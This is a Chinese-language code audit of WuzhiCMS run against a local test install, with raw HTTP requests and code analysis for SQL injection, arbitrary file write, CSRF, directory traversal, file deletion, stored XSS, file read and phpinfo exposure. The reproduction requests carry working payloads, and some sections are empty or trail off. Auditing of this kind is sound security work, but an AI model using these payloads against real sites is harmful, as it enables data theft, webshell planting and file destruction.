wuzhicms代碼審計
前言
安裝環境配置
服務器要求
Web服務器: apache/nginx/iis
PHP環境要求:支持php5.2、php5.3、php5.4、php5.5、php5.6、php7.1 (推薦使用5.4或更高版本!)
數據庫要求: Mysql5
www/install文件夾即可進入安裝頁面
審計開始
首頁文件index.php, 包含了兩個文件;web_config.php是配置文件;
調用load_class加載類application 賦值給$app,通過加載類調用類的方法和屬性
COREFRAME_ROOT: D:\phpStudy\WWW\wuzhicms\coreframe\.core.php
COREFRAME_ROOT.'app/'.$m.'/libs/class/'.$class.'.class.php' 下,根據傳入的 參數進行拼接,以便找到代碼審計中用到的函數的具體實現 ;$m 是 model 模型,它的默認值為 core
1、sql注入
限制
存在參數:m=member&f=group&v=del&groupid=
復現
GET /wuzhicms/www/index.php?m=member&f=group&v=del&groupid=+11+and+updatexml(1,concat(0x7e,database(),0x7e),1)&_su=wuzhicms&_menuid=86&callback=jQuery111108443484589395018_1684328007000&_=1684328007001 HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/wuzhicms/www/index.php?m=member&f=group&v=listing&_su=wuzhicms&_menuid=86
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=pliaroesrtdrgipa7ukdog7ks3; RiH_uid=5oOFbbvGrd1UUpvhkgDTXQ%3D%3D; RiH_username=I97cvAnVbpq1GhuWC2JdWQ%3D%3D; RiH_wz_name=Dt6xwSQrzKyvUb9Rsr8xeQ%3D%3D; RiH_siteid=Z0bFPM%2BHidTg9jT%2FtuA%2B7w%3D%3D
Connection: close直接爆出數據庫語句
payload: 11 and updatexml(1,concat(0x7e,database(),0x7e),1)
代碼
先判斷groupid參數是否存在,存在在判斷是否為數組,將這個數組轉為字符串賦值給$where;這里不管groupid是不是數組都會調用delete函數
db.class.php文件里找到delete函數,并且有調用 兩個方法;
array2sql方法主要將數組轉為sql格式。
首先將數組鍵值分離,再把值里存在的特殊字符替換為空,沒有處理數據庫的操作
master_db函數才是真正去操作數據庫的函數
傳入的sql語句并沒有進行任何過濾就直接拼接到$sql并通過query()執行
這里如果語句錯誤會將sql語句爆出來,所以存在報錯注入
2、任意文件寫入
限制
后臺
復現
GET /wuzhicms/www/index.php?m=attachment&f=index&_su=wuzhicms&v=ueditor&submit=1&setting=<%3fphp+phpinfo()%3b%3f> HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/wuzhicms/www/index.php?m=core&f=index&_su=wuzhicms
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=nh015f9ktjh3t8i4phiok49ga3; RiH_siteid=p6OJQbtNe4vuJdj%2FRo%2B1LQ%3D%3D; RiH_uid=LqrwgnpVlbhREvcbJFlNPw%3D%3D; RiH_username=01uDy7di2dbou5R%2FmhgGqQ%3D%3D; RiH_wz_name=leCEejPkq%2Flc1hU3yuUUVw%3D%3D
Connection: close構造存在submit的情況
代碼
使用工具審計到危險函數file_put_contents(),通過危險函數將內容寫入到緩存文件里,如果$date可控就可以將任意內容寫入到php文件中 ,跟蹤set_cache函數分析調用這個函數的方法
ueditor方法里調用了set_cache函數。 if只判斷是否設置了 submit 參數,存在就會執行寫入,setting 參數也就是 $data 部分 。否則 會通過 get_cache() 讀取緩存文件內容
set_cache($filename, $data, $dir = '_cache_')
set_cache(filename:V, $GLOBALS['setting']);
3、CSRF
限制
要讓管理員登錄網站的同時誘騙他去點擊我發送的網址
復現
右擊鼠標原則csrf poc
構造普通用戶(已注冊)復制構造好的html。直接添加會提示賬戶不存在所以要先注冊一個普通用戶
代碼
根據路由漲到對應代碼文件:index.php?m=core&f=power&v=add&&_su=wuzhicms
先是存在submit參數才會進入一系例操作;username為空就提示,并且給username賦值, 根據用戶名 從數據庫中查找前臺賬戶,如果該前臺用戶不存在則會提示如下內容;判斷uid是否不存在,不存在提示不存在,然后去數據庫查找,存在則提示已存在;下面是驗證密碼是否存在,最后把內容插入數據庫,過程中沒有使用隨機token驗證或其他的驗證
4、目錄遍歷
限制
后臺
復現
GET /wuzhicms/www/index.php?m=template&f=index&v=listing&dir=.....///.....///.....///&_su=wuzhicms HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: RiH_auth=zLGn%2BqbtDHxJFlV2Pt8y6AcXFpAIO5xwW8anmGwQ2sQl%2B1IMRBsM6ZxpAc3%2FPOznBnlPdi42dD0C5vw52L3XXaAECHnAWHJlSmaHHqvMeuMkTeyK4MFD%2Bw%3D%3D; RiH__uid=D2oU95p7gwVL2bJQgKeCXw%3D%3D; RiH__username=wInAaxsOWKbjQ5Jt5C%2F6ZQ%3D%3D; RiH__groupid=n81pE%2BtpShzrqE4TAb0p3g%3D%3D; RiH_truename=ceshi3; RiH_modelid=10; RiH_siteid=DCKb48sEMAct9cg2geteFg%3D%3D; PHPSESSID=8kom5gg5oh1q0vo53abitna5q1; RiH_uid=c%2BfeHpVkwi9O3u6FQUAhqA%3D%3D; RiH_username=GWEjobSbmOdma9fhJabQKQ%3D%3D; RiH_wz_name=HfEWylKJPeWrEtl6hFNkjg%3D%3D
Connection: close
代碼
glob() 函數返回匹配指定模式的文件名或目錄。(.....///)==../
上面對dir參數做了替換,出現'..\\', '../', './', '.\\',替換為空,存在'%2F','//',替換為/。并且只替換一次。通過 template() 函數執行listing.tpl.php 文件
將目錄下的內容遍歷輸出
5、dom(存儲)型xss
限制
復現
前端觸發
后臺觸發
代碼
6、任意文件刪除
限制
后臺
復現
GET /wuzhicms/www/index.php?v=del&url=../ceshi.txt&m=attachment&f=index&_su=wuzhicms&_menuid=29&_submenuid=52 HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://127.0.0.1/wuzhicms/www/index.php?dir=qr_image&m=attachment&f=index&v=dir&_su=wuzhicms&_menuid=29&_submenuid=52
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: RiH_auth=zLGn%2BqbtDHxJFlV2Pt8y6AcXFpAIO5xwW8anmGwQ2sQl%2B1IMRBsM6ZxpAc3%2FPOznBnlPdi42dD0C5vw52L3XXaAECHnAWHJlSmaHHqvMeuMkTeyK4MFD%2Bw%3D%3D; RiH__uid=D2oU95p7gwVL2bJQgKeCXw%3D%3D; RiH__username=wInAaxsOWKbjQ5Jt5C%2F6ZQ%3D%3D; RiH__groupid=n81pE%2BtpShzrqE4TAb0p3g%3D%3D; RiH_truename=ceshi3; RiH_modelid=10; RiH_siteid=DCKb48sEMAct9cg2geteFg%3D%3D; PHPSESSID=8kom5gg5oh1q0vo53abitna5q1; RiH_uid=c%2BfeHpVkwi9O3u6FQUAhqA%3D%3D; RiH_username=GWEjobSbmOdma9fhJabQKQ%3D%3D; RiH_wz_name=HfEWylKJPeWrEtl6hFNkjg%3D%3D; RiH_userkeys=2vJ4MaNT6q6Af47lnCIg3w%3D%3D
Connection: close
在www/新建ceshi.txt
代碼
根據路由找到對應代碼文件
wuzhicms/www/index.php?v=del&url=../ceshi.txt&m=attachment&f=index&_su=wuzhicms
判斷傳入的兩個參數id、url是否存在,remove_xss函數對url做了過濾 。實質是過濾xss的,但過濾的這些字符里不包含../。
如果不傳入id參數則會走下面的else,判斷傳入的 path是否在數據庫中,如果不在就執行my_unlink刪除操作
7、存儲型xss
限制
后臺插入,前端彈窗
復現
POST /wuzhicms/www/index.php?m=content&f=content&v=edit&id=182&type=&cid=43&_su=wuzhicms&_menuid=0 HTTP/1.1
Host: 127.0.0.1
Content-Length: 784
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://127.0.0.1/wuzhicms/www/index.php?m=content&f=content&v=edit&id=182&type=&cid=43&_su=wuzhicms&_menuid=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: RiH_auth=zLGn%2BqbtDHxJFlV2Pt8y6AcXFpAIO5xwW8anmGwQ2sQl%2B1IMRBsM6ZxpAc3%2FPOznBnlPdi42dD0C5vw52L3XXaAECHnAWHJlSmaHHqvMeuMkTeyK4MFD%2Bw%3D%3D; RiH__uid=D2oU95p7gwVL2bJQgKeCXw%3D%3D; RiH__username=wInAaxsOWKbjQ5Jt5C%2F6ZQ%3D%3D; RiH__groupid=n81pE%2BtpShzrqE4TAb0p3g%3D%3D; RiH_truename=ceshi3; RiH_modelid=10; PHPSESSID=rugt9gvjv8qsti0s2o0pssv905; RiH_siteid=3ye8zbHHvJ39hglv%2Beswxw%3D%3D; RiH_uid=%2BNryPpAz79%2Fj9RcfeODNQQ%3D%3D; RiH_username=rHY8uux7ev%2FyAI7MlE7c8g%3D%3D; RiH_wz_name=XUfU%2FGeZc4Yn4VmyeDiIAQ%3D%3D; RiH_qkey=GdkvbKLauqaBUT5DZy7qzUd4zKeGbQ36
Connection: closeform%5Btitle%5D=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3eaa&title_css=&form%5Bcontent%5D=%3Cp%3E%E6%B5%8B%E8%AF%952%26%2339%3B%26lt%3B%26gt%3Bbb%3C%2Fp%3E%0D%0A&form%5Byouku%5D=http%3A%2F%2Fv.youku.com%2Fv_show%2Fid_XMTU1Njg1OTAxMg%3D%3D.html%3Ffrom%3Dy1.3-idx-beta-1519-23042.230771.3-1&form%5Btudou%5D=&form%5Bkeywords%5D=&form%5Bremark%5D=%E6%B5%8B%E8%AF%95%0D%0A&form%5Bthumb%5D=&form%5Bblock%5D%5B%5D=no_value&form%5Bstatus%5D=9&url=http%3A%2F%2F127.0.0.1%2Fwuzhicms%2Fwww%2Findex.php%3Fv%3Dshow%26cid%3D43%26id%3D182&form%5Broute%5D=0&form%5Brelation%5D=&search=&form%5Baddtime%5D=2016-05-20+09%3A11%3A56&form%5Bsort%5D=0&form%5Btemplate%5D=&form%5Ballowcomment%5D=1&form%5Bgroups%5D=no_value&modelid=7&old_status=9&submit=+%E6%8F%90+%E4%BA%A4+
代碼
此處做了過濾但是沒有過濾<>,此處也存在sql注入,雖然過濾了'",但也帶入到數據庫更新了
對title的過濾
其他存在xss的地方
POST /wuzhicms/www/index.php?m=content&f=block&v=item_edit&id=210&_su=wuzhicms&_menuid=57
POST /wuzhicms/www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101
8、任意文件讀取
限制
后臺
復現
uploadfile\member\a8\4 下新建1.txt
代碼
WWW_ROOT:\WWW\wuzhicms\bin/../
WWW_ROOT拼接了后面的路徑賦值給$sql_path。fopen.w寫入的方式打開,沒有就創建。結果賦值給$sql_file。過程沒有對路徑過濾,可以使用../跳到其他目錄
9、信息泄露
限制
m=core&f=index&v=phpinfo
復現
GET /wuzhicms/www/index.php?m=core&f=index&v=phpinfo&_su=wuzhicms&_menuid=11&_submenuid=47 HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://127.0.0.1/wuzhicms/www/index.php?m=core&f=model&v=model_listing&app=content&_su=wuzhicms&_menuid=45
Accept-Encoding: gzip, deflate
Accept-Language: ../../,zh;q=0.9
Cookie: PHPSESSID=rugt9gvjv8qsti0s2o0pssv905; RiH_siteid=3ye8zbHHvJ39hglv%2Beswxw%3D%3D; RiH_qkey=GdkvbKLauqaBUT5DZy7qzUd4zKeGbQ36; sid=; RiH_uid=uqlxl2PdYTyVqiBK3QAD%2FA%3D%3D; RiH_username=qNjRc1Jym7b4QYH3bFeKCA%3D%3D; RiH_wz_name=ZE%2FQpS7skiWHTRuTh7wGBg%3D%3D; mYM_siteid=ZZQaB%2BcTRLRNiCsFrqdvfw%3D%3D; mYM_qkey=bW7PvmhFsAJKfi4LvZkVX1bI04WDYr76; mYM_userkeys=UjOnYzvxR52J7mqM%2BjPv1g%3D%3D; mYM_uid=D3s5ZUdk0BOuMYm%2BjYH9Aw%3D%3D; mYM_username=0xgAf6uGD%2BoB8ulGN7CEQQ%3D%3D; mYM_wz_name=Jbwkr75OzXiI%2BAI3n88exw%3D%3D
Connection: close
代碼
直接輸出phpinfo
方法對文件進行操作)
)
)
)
)
